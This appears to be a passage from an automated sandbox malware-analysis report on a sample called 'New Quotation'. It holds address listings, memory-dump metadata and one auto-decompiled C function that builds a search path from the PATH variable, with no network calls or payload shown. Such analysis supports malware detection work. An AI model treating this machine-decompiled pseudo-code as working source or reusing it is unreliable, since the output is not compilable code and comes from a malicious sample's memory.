                                                                                                                                                                                          0x1d80ccd1
                                                                                                                                                                                          0x1d80ccd9
                                                                                                                                                                                          0x1d80cce0
                                                                                                                                                                                          0x1d80ccee
                                                                                                                                                                                          0x1d80ccf1
                                                                                                                                                                                          0x1d80ccf6
                                                                                                                                                                                          0x1d80ccfa
                                                                                                                                                                                          0x1d80ccfd
                                                                                                                                                                                          0x1d80cd02
                                                                                                                                                                                          0x1d80cd08
                                                                                                                                                                                          0x1d80cd0f
                                                                                                                                                                                          0x1d80cd1d
                                                                                                                                                                                          0x1d80cd20
                                                                                                                                                                                          0x1d80cd20
                                                                                                                                                                                          0x1d80cd22
                                                                                                                                                                                          0x1d80cd25
                                                                                                                                                                                          0x1d80cd2a
                                                                                                                                                                                          0x1d80cd2d
                                                                                                                                                                                          0x1d80cd30
                                                                                                                                                                                          0x1d80cd32
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80cd3b
                                                                                                                                                                                          0x1d80cd40
                                                                                                                                                                                          0x1d80cd46
                                                                                                                                                                                          0x1d80cd4b
                                                                                                                                                                                          0x1d80cd4e
                                                                                                                                                                                          0x1d8487ff
                                                                                                                                                                                          0x1d848801
                                                                                                                                                                                          0x1d848802
                                                                                                                                                                                          0x1d848802
                                                                                                                                                                                          0x1d80cd56
                                                                                                                                                                                          0x1d80cd5b
                                                                                                                                                                                          0x1d80cd64
                                                                                                                                                                                          0x1d80cd67
                                                                                                                                                                                          0x1d80cd69
                                                                                                                                                                                          0x1d848809
                                                                                                                                                                                          0x1d84880b
                                                                                                                                                                                          0x1d848810
                                                                                                                                                                                          0x1d848811
                                                                                                                                                                                          0x1d848813
                                                                                                                                                                                          0x1d848815
                                                                                                                                                                                          0x1d84881a
                                                                                                                                                                                          0x1d84881c
                                                                                                                                                                                          0x1d8488c2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8488c2
                                                                                                                                                                                          0x1d848822
                                                                                                                                                                                          0x1d848825
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80cd6f
                                                                                                                                                                                          0x1d80cd6f
                                                                                                                                                                                          0x1d80cd6f
                                                                                                                                                                                          0x1d80cd78
                                                                                                                                                                                          0x1d80cd80
                                                                                                                                                                                          0x1d80cd82
                                                                                                                                                                                          0x1d80cd85
                                                                                                                                                                                          0x1d80cd87
                                                                                                                                                                                          0x1d80cd8a
                                                                                                                                                                                          0x1d80cd91
                                                                                                                                                                                          0x1d84883d
                                                                                                                                                                                          0x1d848840
                                                                                                                                                                                          0x1d848840
                                                                                                                                                                                          0x1d80cd9d
                                                                                                                                                                                          0x1d80cda6
                                                                                                                                                                                          0x1d80cda8
                                                                                                                                                                                          0x1d80cdab
                                                                                                                                                                                          0x1d80cdad
                                                                                                                                                                                          0x1d80cdb0
                                                                                                                                                                                          0x1d80cdb2
                                                                                                                                                                                          0x1d84884a
                                                                                                                                                                                          0x1d84884d
                                                                                                                                                                                          0x1d848850
                                                                                                                                                                                          0x1d848850
                                                                                                                                                                                          0x1d80cdba
                                                                                                                                                                                          0x1d80cdc5
                                                                                                                                                                                          0x1d80cdc9
                                                                                                                                                                                          0x1d80cdce
                                                                                                                                                                                          0x1d80cdd0
                                                                                                                                                                                          0x1d84885b
                                                                                                                                                                                          0x1d84886a
                                                                                                                                                                                          0x1d84886d
                                                                                                                                                                                          0x1d84886f
                                                                                                                                                                                          0x1d8488cb
                                                                                                                                                                                          0x1d8488cd
                                                                                                                                                                                          0x1d8488ce
                                                                                                                                                                                          0x1d8488d0
                                                                                                                                                                                          0x1d8488d2
                                                                                                                                                                                          0x1d8488d7
                                                                                                                                                                                          0x1d8488d9
                                                                                                                                                                                          0x1d8488df
                                                                                                                                                                                          0x1d8488e1
                                                                                                                                                                                          0x1d8488ea
                                                                                                                                                                                          0x1d8488ef
                                                                                                                                                                                          0x1d8488f4
                                                                                                                                                                                          0x1d8488f5
                                                                                                                                                                                          0x1d8488f6
                                                                                                                                                                                          0x1d8488f8
                                                                                                                                                                                          0x1d848905
                                                                                                                                                                                          0x1d8488fa
                                                                                                                                                                                          0x1d848900
                                                                                                                                                                                          0x1d848900
                                                                                                                                                                                          0x1d84890b
                                                                                                                                                                                          0x1d848910
                                                                                                                                                                                          0x1d848910
                                                                                                                                                                                          0x1d848917
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d848917
                                                                                                                                                                                          0x1d848873
                                                                                                                                                                                          0x1d84887a
                                                                                                                                                                                          0x1d84887f
                                                                                                                                                                                          0x1d848882
                                                                                                                                                                                          0x1d848884
                                                                                                                                                                                          0x1d848887
                                                                                                                                                                                          0x1d8488c7
                                                                                                                                                                                          0x1d8488c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8488c7
                                                                                                                                                                                          0x1d848889
                                                                                                                                                                                          0x1d848889
                                                                                                                                                                                          0x1d84888c
                                                                                                                                                                                          0x1d84888e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d848890
                                                                                                                                                                                          0x1d848892
                                                                                                                                                                                          0x1d848895
                                                                                                                                                                                          0x1d848897
                                                                                                                                                                                          0x1d84889f
                                                                                                                                                                                          0x1d8488a2
                                                                                                                                                                                          0x1d8488a2
                                                                                                                                                                                          0x1d8488a8
                                                                                                                                                                                          0x1d8488ad
                                                                                                                                                                                          0x1d8488b3
                                                                                                                                                                                          0x1d8488b5
                                                                                                                                                                                          0x1d8488b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8488b7
                                                                                                                                                                                          0x1d84885d
                                                                                                                                                                                          0x1d848860
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80cdd6
                                                                                                                                                                                          0x1d80cdd6
                                                                                                                                                                                          0x1d80cdd6
                                                                                                                                                                                          0x1d80cdda
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80cde0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80cde0
                                                                                                                                                                                          0x1d80cdd0
                                                                                                                                                                                          0x1d80cd69
                                                                                                                                                                                          0x1d80cde6
                                                                                                                                                                                          0x1d80cdeb
                                                                                                                                                                                          0x1d80cded
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80cdf3
                                                                                                                                                                                          0x1d80cd11
                                                                                                                                                                                          0x1d80cd18

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: 7b8a8ee097be7922fb12c025761c9e835b1b3c51780c13d126ed754dfc202a6c
                                                                                                                                                                                          • Instruction ID: 4d93379e5f58032285a902c06189c45e162859d17e41e93f0c90fa2a41f446e7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b8a8ee097be7922fb12c025761c9e835b1b3c51780c13d126ed754dfc202a6c
                                                                                                                                                                                          • Instruction Fuzzy Hash: E861D775A10209DFCB09DF69C880BADB7B5FF09754F218169E615EB290D734D901CF92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D2EE8 Relevance: 1.7, Strings: 1, Instructions: 410COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E1D7D2EE8(intOrPtr __ecx, signed int __edx, void* _a4, char _a8) {
				signed int _v8;
				unsigned int _v28;
				void _v32;
				char _v33;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t150;
				signed int _t165;
				signed int _t171;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t194;
				signed int _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t210;
				void* _t211;

				_v8 =  *0x1d8cb370 ^ _t209;
				_v68 = __ecx;
				_v56 = __edx;
				_t199 = 0;
				_v88 = 0;
				_v72 = 0;
				_v84 = 0;
				_v80 = 0;
				_v52 = 0;
				_v33 = 0;
				_t185 = 0x50;
				_v60 = 0;
				_v76 = 0;
				_v44 = 0;
				_push(6);
				_t150 = memcpy( &_v32, 0x1d8c92e8, 0 << 2);
				_t211 = _t210 + 0xc;
				_t207 = 0;
				_t205 = 0;
				_t192 = _v28 >> 0x0000001c & 0x00000003;
				_v64 = _t150;
				_v48 = 0;
				_v40 = _v28 >> 0x0000001c & 0x00000003;
				if(_v56 <= 0) {
					L32:
					_t58 = _t185 - 0x50; // 0x0
					if(_t58 <= 0xfffe) {
						L36:
						_t207 = E1D7E5D90(_t192,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t207, _t185);
						_v60 = _t207;
						if(_t207 != 0) {
							_t63 = _t207 + 0x50; // 0x50
							_t205 = _t63;
							 *(_t207 + 0x44) = _t185;
							 *((intOrPtr*)(_t207 + 0x38)) = 0;
							_t185 = 0;
							 *((intOrPtr*)(_t207 + 0x3c)) = 0;
							 *((intOrPtr*)(_t207 + 0x40)) = 0;
							 *(_t207 + 0x4c) = 0;
							_t199 = _v44;
							 *((short*)(_t207 + 0x30)) = _v56;
							if(_t199 != 0) {
								 *(_t207 + 0x18) = _t205;
								 *_t207 = ((0 | _t199 == 0x1d8c6600) - 0x00000001 & 0xfffffffb) + 7;
								E1D8188C0(_t205,  *((intOrPtr*)(_t199 + 4)),  *_t199 & 0x0000ffff);
								_t199 = _v44;
								_t211 = _t211 + 0xc;
								_t185 = 1;
								_t205 = _t205 + (( *_t199 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t182 = E1D85D07E(_v33, _t205);
									_t199 = _v44;
									_t205 = _t182;
								}
							}
							_t194 = 0;
							_v40 = 0;
							if(_v56 <= 0) {
								L67:
								_t208 = _v76;
								 *((short*)(_t205 - 2)) = 0;
								L68:
								_t155 = _v80;
								if(_v80 != 0) {
									E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t155);
								}
								_t156 = _v60;
								if(_v60 != 0 && _t208 < 0) {
									E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t156);
									_t156 = 0;
								}
								L73:
								return E1D814B50(_t156, _t185, _v8 ^ _t209, _t199, _t205, _t208);
							} else {
								_t185 = _t207 + _t185 * 4;
								_v64 = _t185;
								do {
									if(_t199 == 0) {
										L46:
										 *_t185 =  *(_v68 + _t194 * 4);
										 *(_t185 + 0x18) = _t205;
										_t165 =  *(_v68 + _t194 * 4);
										if(_t165 > 8) {
											L35:
											_t192 = 0x25;
											asm("int 0x29");
											goto L36;
										}
										switch( *((intOrPtr*)(_t165 * 4 +  &M1D7D3428))) {
											case 0:
												__ax =  *0x1d8c6610;
												__eflags = __ax;
												if(__ax == 0) {
													goto L65;
												}
												__ax & 0x0000ffff = E1D8188C0(__edi,  *0x1d8c6614, __ax & 0x0000ffff);
												__eax =  *0x1d8c6610 & 0x0000ffff;
												goto L51;
											case 1:
												L56:
												__eax = E1D8188C0(__edi, _v88, _v72);
												__eax = _v72;
												goto L51;
											case 2:
												 *0x1d8c6608 & 0x0000ffff = E1D8188C0(__edi,  *0x1d8c660c,  *0x1d8c6608 & 0x0000ffff);
												__eax =  *0x1d8c6608 & 0x0000ffff;
												__eax = ( *0x1d8c6608 & 0x0000ffff) >> 1;
												__edi = __edi + __eax * 2;
												goto L53;
											case 3:
												__eax = _v52;
												__eflags = __eax;
												if(__eax == 0) {
													goto L65;
												}
												__esi = __eax + __eax;
												__eax = E1D8188C0(__edi, _v80, __esi);
												__edi = __edi + __esi;
												__esi = _v60;
												goto L52;
											case 4:
												_push(0x2e);
												_pop(_t166);
												 *(_t207 + 0x4c) = _t205;
												 *_t205 = _t166;
												_t205 = _t205 + 4;
												_push(0x3b);
												_pop(_t167);
												 *((short*)(_t205 - 2)) = _t167;
												goto L65;
											case 5:
												__eflags = _v48;
												if(_v48 == 0) {
													goto L56;
												}
												__eax = E1D8188C0(__edi, _v84, _v48);
												__eax = _v48;
												L51:
												__eax = __eax >> 1;
												__esp = __esp + 0xc;
												__edi = __edi + __eax * 2;
												__edi = __edi + 2;
												__eflags = __edi;
												L52:
												_push(0x3b);
												_pop(__eax);
												 *(__edi - 2) = __ax;
												goto L53;
											case 6:
												__ebx =  *0x1d8c33d8;
												__eflags = __ebx - 0x1d8c33d8;
												if(__ebx == 0x1d8c33d8) {
													L64:
													__ebx = _v64;
													goto L65;
												}
												_push(0x3b);
												_pop(__esi);
												do {
													__eax =  *(__ebx + 8) & 0x0000ffff;
													_t119 = __ebx + 0xa; // 0x773f33e2
													_t119 = E1D8188C0(__edi, _t119,  *(__ebx + 8) & 0x0000ffff);
													__eax =  *(__ebx + 8) & 0x0000ffff;
													__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													 *(__edi - 2) = __si;
													__ebx =  *__ebx;
													__eflags = __ebx - 0x1d8c33d8;
												} while (__ebx != 0x1d8c33d8);
												__esi = _v60;
												__ecx = _v40;
												__edx = _v44;
												goto L64;
											case 7:
												 *0x1d8c6600 & 0x0000ffff = E1D8188C0(__edi,  *0x1d8c6604,  *0x1d8c6600 & 0x0000ffff);
												__eax =  *0x1d8c6600 & 0x0000ffff;
												__eax = ( *0x1d8c6600 & 0x0000ffff) >> 1;
												__eflags = _a8;
												__edi = __edi + __eax * 2;
												if(_a8 != 0) {
													__cl = _v33;
													__edx = __edi;
													__eax = E1D85D07E(__ecx, __edi);
													__edi = __eax;
												}
												goto L53;
											case 8:
												__eflags =  *0x1d8c4ff8;
												if( *0x1d8c4ff8 == 0) {
													L65:
													_t185 = _t185 + 4;
													__eflags = _t185;
													_v64 = _t185;
													goto L66;
												}
												__eax = 0;
												 *(__edi - 2) = __ax;
												 *0x1d8c4ff8 & 0x0000ffff = E1D8188C0(__edi,  *0x1d8c4ffc,  *0x1d8c4ff8 & 0x0000ffff);
												__eax =  *0x1d8c690c; // 0x0
												 *(__esi + 0x40) = __edi;
												 *(__esi + 0x3c) = __eax;
												__eax =  *0x1d8c4ff8 & 0x0000ffff;
												__eax = ( *0x1d8c4ff8 & 0x0000ffff) >> 1;
												__edi = __edi + __eax * 2;
												__edi = __edi + 2;
												L53:
												__ecx = _v40;
												__edx = _v44;
												goto L65;
										}
									}
									_t171 =  *(_v68 + _t194 * 4);
									if(_t171 == 0) {
										goto L66;
									}
									if(_t171 == 5) {
										goto L66;
									}
									goto L46;
									L66:
									_t194 = _t194 + 1;
									_v40 = _t194;
								} while (_t194 < _v56);
								goto L67;
							}
						}
						_t208 = 0xc0000017;
						goto L68;
					}
					_t208 = 0xc0000106;
					goto L68;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t184 =  *(_v68 + _t205 * 4);
					if(_t184 > 8) {
						goto L35;
					}
					switch( *((intOrPtr*)(_t184 * 4 +  &M1D7D3404))) {
						case 0:
							__ax =  *0x1d8c6610;
							goto L28;
						case 1:
							L9:
							__edx =  &_v72;
							__ecx = 0;
							__eax = E1D7D344C(0,  &_v72);
							_v72 = _v72 + 2;
							_v88 = __eax;
							__ebx = __ebx + _v72 + 2;
							__eflags = __ebx;
							goto L10;
						case 2:
							__eax =  *0x1d8c6608 & 0x0000ffff;
							__ebx = __ebx + __eax;
							__eflags = __cl - 1;
							if(__cl != 1) {
								goto L31;
							} else {
								__eax = 0x1d8c6608;
								goto L13;
							}
						case 3:
							E1D7DFED0(0x1d8c5b40) =  &_v52;
							__esi = E1D7DF870(__esi, L"PATH", "true", __esi, __esi,  &_v52);
							_v76 = __esi;
							__eflags = __esi - 0xc0000023;
							if(__esi != 0xc0000023) {
								L17:
								_push(0x1d8c5b40);
								__eax = E1D7DE740(__ecx);
								__eflags = __esi - 0xc0000100;
								if(__esi != 0xc0000100) {
									__eflags = __esi;
									if(__esi < 0) {
										goto L68;
									}
									__eax = _v52;
									__edx = _v48;
									__ecx = _v40;
									__ebx = __ebx + __eax * 2;
									__ebx = __ebx + 2;
									__esi = 0;
									goto L31;
								}
								__esi = 0;
								_v52 = 0;
								_v76 = 0;
								L10:
								__edx = _v48;
								__ecx = _v40;
								goto L31;
							}
							__eax = _v52;
							__ecx =  *0x1d8c5d78; // 0x0
							_v52 + _v52 =  *[fs:0x30];
							__ecx = __ecx + 0x180000;
							__eax = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
							_v80 = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								_push(0x1d8c5b40);
								__eax = E1D7DE740(__ecx);
								__eax = _v60;
								goto L73;
							}
							__ecx =  &_v52;
							__eax = E1D7DF870(0, L"PATH", "true", __eax, _v52,  &_v52);
							__esi = __eax;
							_v76 = __eax;
							goto L17;
						case 4:
							_t185 = _t185 + 4;
							goto L31;
						case 5:
							__eax = _v64;
							__eflags = __eax;
							if(__eax != 0) {
								__edx =  &_v48;
								__ecx = __eax;
								__eax = E1D7D344C(__eax,  &_v48);
								__edx = _v48;
								__ecx = _v40;
								_v84 = __eax;
							}
							__eflags = __edx;
							if(__edx == 0) {
								goto L9;
							} else {
								__ebx = __ebx + 2;
								__ebx = __ebx + __edx;
								goto L31;
							}
						case 6:
							__eax =  *0x1d8c33e0 & 0x0000ffff;
							goto L30;
						case 7:
							__ecx =  *0x1d8c6600 & 0x0000ffff;
							__ebx = __ebx + __ecx;
							__eflags = _a8;
							if(__eflags != 0) {
								__eax =  *0x1d8c391c; // 0x16
								__eax = __eax & 0x00000100;
								_v33 = __eflags != 0;
								__ebx = __ebx + 0x16;
								__ebx = __ebx + __ecx;
								__eflags = __eax;
								if(__eax != 0) {
									__ebx = __ebx + 0x1e;
									__ebx = __ebx + __ecx;
									__eflags = __ebx;
								}
							}
							__ecx = _v40;
							__eflags = __cl - 1;
							if(__cl == 1) {
								__eax = 0x1d8c6600;
								L13:
								_v44 = __eax;
							}
							goto L31;
						case 8:
							__ax =  *0x1d8c4ff8;
							L28:
							__eflags = __ax;
							if(__ax == 0) {
								L31:
								_t205 = _t205 + 1;
								if(_t205 < _v56) {
									goto L1;
								}
								goto L32;
							}
							__eax = __ax & 0x0000ffff;
							__eax = (__ax & 0x0000ffff) + 2;
							__eflags = __eax;
							L30:
							__ebx = __ebx + __eax;
							__eflags = __ebx;
							goto L31;
					}
				}
				goto L35;
			}




































                                                                                                                                                                                          0x1d7d2ef7
                                                                                                                                                                                          0x1d7d2f00
                                                                                                                                                                                          0x1d7d2f08
                                                                                                                                                                                          0x1d7d2f0d
                                                                                                                                                                                          0x1d7d2f0f
                                                                                                                                                                                          0x1d7d2f12
                                                                                                                                                                                          0x1d7d2f1a
                                                                                                                                                                                          0x1d7d2f1d
                                                                                                                                                                                          0x1d7d2f20
                                                                                                                                                                                          0x1d7d2f23
                                                                                                                                                                                          0x1d7d2f26
                                                                                                                                                                                          0x1d7d2f27
                                                                                                                                                                                          0x1d7d2f2a
                                                                                                                                                                                          0x1d7d2f2d
                                                                                                                                                                                          0x1d7d2f30
                                                                                                                                                                                          0x1d7d2f33
                                                                                                                                                                                          0x1d7d2f33
                                                                                                                                                                                          0x1d7d2f38
                                                                                                                                                                                          0x1d7d2f3d
                                                                                                                                                                                          0x1d7d2f3f
                                                                                                                                                                                          0x1d7d2f42
                                                                                                                                                                                          0x1d7d2f45
                                                                                                                                                                                          0x1d7d2f48
                                                                                                                                                                                          0x1d7d2f4e
                                                                                                                                                                                          0x1d7d30f8
                                                                                                                                                                                          0x1d7d30f8
                                                                                                                                                                                          0x1d7d3100
                                                                                                                                                                                          0x1d7d3123
                                                                                                                                                                                          0x1d7d3133
                                                                                                                                                                                          0x1d7d3135
                                                                                                                                                                                          0x1d7d313a
                                                                                                                                                                                          0x1d7d3149
                                                                                                                                                                                          0x1d7d3149
                                                                                                                                                                                          0x1d7d314e
                                                                                                                                                                                          0x1d7d3151
                                                                                                                                                                                          0x1d7d3154
                                                                                                                                                                                          0x1d7d3156
                                                                                                                                                                                          0x1d7d3159
                                                                                                                                                                                          0x1d7d315c
                                                                                                                                                                                          0x1d7d315f
                                                                                                                                                                                          0x1d7d3162
                                                                                                                                                                                          0x1d7d3168
                                                                                                                                                                                          0x1d7d316c
                                                                                                                                                                                          0x1d7d317f
                                                                                                                                                                                          0x1d7d3189
                                                                                                                                                                                          0x1d7d318e
                                                                                                                                                                                          0x1d7d3191
                                                                                                                                                                                          0x1d7d3194
                                                                                                                                                                                          0x1d7d319e
                                                                                                                                                                                          0x1d7d31a1
                                                                                                                                                                                          0x1d7d31a8
                                                                                                                                                                                          0x1d7d31ad
                                                                                                                                                                                          0x1d7d31b0
                                                                                                                                                                                          0x1d7d31b0
                                                                                                                                                                                          0x1d7d31a1
                                                                                                                                                                                          0x1d7d31b2
                                                                                                                                                                                          0x1d7d31b4
                                                                                                                                                                                          0x1d7d31ba
                                                                                                                                                                                          0x1d7d3329
                                                                                                                                                                                          0x1d7d3329
                                                                                                                                                                                          0x1d7d332e
                                                                                                                                                                                          0x1d7d3332
                                                                                                                                                                                          0x1d7d3332
                                                                                                                                                                                          0x1d7d3337
                                                                                                                                                                                          0x1d7d3345
                                                                                                                                                                                          0x1d7d3345
                                                                                                                                                                                          0x1d7d334a
                                                                                                                                                                                          0x1d7d334f
                                                                                                                                                                                          0x1d7d3361
                                                                                                                                                                                          0x1d7d3366
                                                                                                                                                                                          0x1d7d3366
                                                                                                                                                                                          0x1d7d3368
                                                                                                                                                                                          0x1d7d3376
                                                                                                                                                                                          0x1d7d31c0
                                                                                                                                                                                          0x1d7d31c0
                                                                                                                                                                                          0x1d7d31c3
                                                                                                                                                                                          0x1d7d31c6
                                                                                                                                                                                          0x1d7d31c8
                                                                                                                                                                                          0x1d7d31e3
                                                                                                                                                                                          0x1d7d31e9
                                                                                                                                                                                          0x1d7d31ee
                                                                                                                                                                                          0x1d7d31f1
                                                                                                                                                                                          0x1d7d31f7
                                                                                                                                                                                          0x1d7d311e
                                                                                                                                                                                          0x1d7d3120
                                                                                                                                                                                          0x1d7d3121
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3121
                                                                                                                                                                                          0x1d7d31fd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d321c
                                                                                                                                                                                          0x1d7d3222
                                                                                                                                                                                          0x1d7d3225
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3236
                                                                                                                                                                                          0x1d7d323b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3276
                                                                                                                                                                                          0x1d7d327d
                                                                                                                                                                                          0x1d7d3282
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3296
                                                                                                                                                                                          0x1d7d329b
                                                                                                                                                                                          0x1d7d32a5
                                                                                                                                                                                          0x1d7d32a7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d32ac
                                                                                                                                                                                          0x1d7d32af
                                                                                                                                                                                          0x1d7d32b1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d32b3
                                                                                                                                                                                          0x1d7d32bb
                                                                                                                                                                                          0x1d7d32c6
                                                                                                                                                                                          0x1d7d32c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3204
                                                                                                                                                                                          0x1d7d3206
                                                                                                                                                                                          0x1d7d3207
                                                                                                                                                                                          0x1d7d320a
                                                                                                                                                                                          0x1d7d320d
                                                                                                                                                                                          0x1d7d3210
                                                                                                                                                                                          0x1d7d3212
                                                                                                                                                                                          0x1d7d3213
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d325f
                                                                                                                                                                                          0x1d7d3263
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d326c
                                                                                                                                                                                          0x1d7d3271
                                                                                                                                                                                          0x1d7d3242
                                                                                                                                                                                          0x1d7d3242
                                                                                                                                                                                          0x1d7d3244
                                                                                                                                                                                          0x1d7d3247
                                                                                                                                                                                          0x1d7d324a
                                                                                                                                                                                          0x1d7d324a
                                                                                                                                                                                          0x1d7d324d
                                                                                                                                                                                          0x1d7d324d
                                                                                                                                                                                          0x1d7d324f
                                                                                                                                                                                          0x1d7d3250
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d32cd
                                                                                                                                                                                          0x1d7d32d3
                                                                                                                                                                                          0x1d7d32d9
                                                                                                                                                                                          0x1d7d3313
                                                                                                                                                                                          0x1d7d3313
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3313
                                                                                                                                                                                          0x1d7d32db
                                                                                                                                                                                          0x1d7d32dd
                                                                                                                                                                                          0x1d7d32de
                                                                                                                                                                                          0x1d7d32de
                                                                                                                                                                                          0x1d7d32e3
                                                                                                                                                                                          0x1d7d32e8
                                                                                                                                                                                          0x1d7d32ed
                                                                                                                                                                                          0x1d7d32f4
                                                                                                                                                                                          0x1d7d32f6
                                                                                                                                                                                          0x1d7d32f9
                                                                                                                                                                                          0x1d7d32fc
                                                                                                                                                                                          0x1d7d3300
                                                                                                                                                                                          0x1d7d3302
                                                                                                                                                                                          0x1d7d3302
                                                                                                                                                                                          0x1d7d330a
                                                                                                                                                                                          0x1d7d330d
                                                                                                                                                                                          0x1d7d3310
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3388
                                                                                                                                                                                          0x1d7d338d
                                                                                                                                                                                          0x1d7d3397
                                                                                                                                                                                          0x1d7d3399
                                                                                                                                                                                          0x1d7d339d
                                                                                                                                                                                          0x1d7d33a0
                                                                                                                                                                                          0x1d7d33a6
                                                                                                                                                                                          0x1d7d33a9
                                                                                                                                                                                          0x1d7d33ab
                                                                                                                                                                                          0x1d7d33b0
                                                                                                                                                                                          0x1d7d33b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d33b7
                                                                                                                                                                                          0x1d7d33bf
                                                                                                                                                                                          0x1d7d3316
                                                                                                                                                                                          0x1d7d3316
                                                                                                                                                                                          0x1d7d3316
                                                                                                                                                                                          0x1d7d3319
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d3319
                                                                                                                                                                                          0x1d7d33c5
                                                                                                                                                                                          0x1d7d33c7
                                                                                                                                                                                          0x1d7d33da
                                                                                                                                                                                          0x1d7d33df
                                                                                                                                                                                          0x1d7d33e7
                                                                                                                                                                                          0x1d7d33ea
                                                                                                                                                                                          0x1d7d33ed
                                                                                                                                                                                          0x1d7d33f4
                                                                                                                                                                                          0x1d7d33f6
                                                                                                                                                                                          0x1d7d33f9
                                                                                                                                                                                          0x1d7d3254
                                                                                                                                                                                          0x1d7d3254
                                                                                                                                                                                          0x1d7d3257
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d31fd
                                                                                                                                                                                          0x1d7d31d1
                                                                                                                                                                                          0x1d7d31d4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d31dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d331c
                                                                                                                                                                                          0x1d7d331c
                                                                                                                                                                                          0x1d7d331d
                                                                                                                                                                                          0x1d7d3320
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d31c6
                                                                                                                                                                                          0x1d7d31ba
                                                                                                                                                                                          0x1d7d313c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d313c
                                                                                                                                                                                          0x1d7d3102
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2f54
                                                                                                                                                                                          0x1d7d2f54
                                                                                                                                                                                          0x1d7d2f57
                                                                                                                                                                                          0x1d7d2f5d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2f63
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2f72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d2fa5
                                                                                                                                                                                          0x1d7d2fa5
                                                                                                                                                                                          0x1d7d2fa8
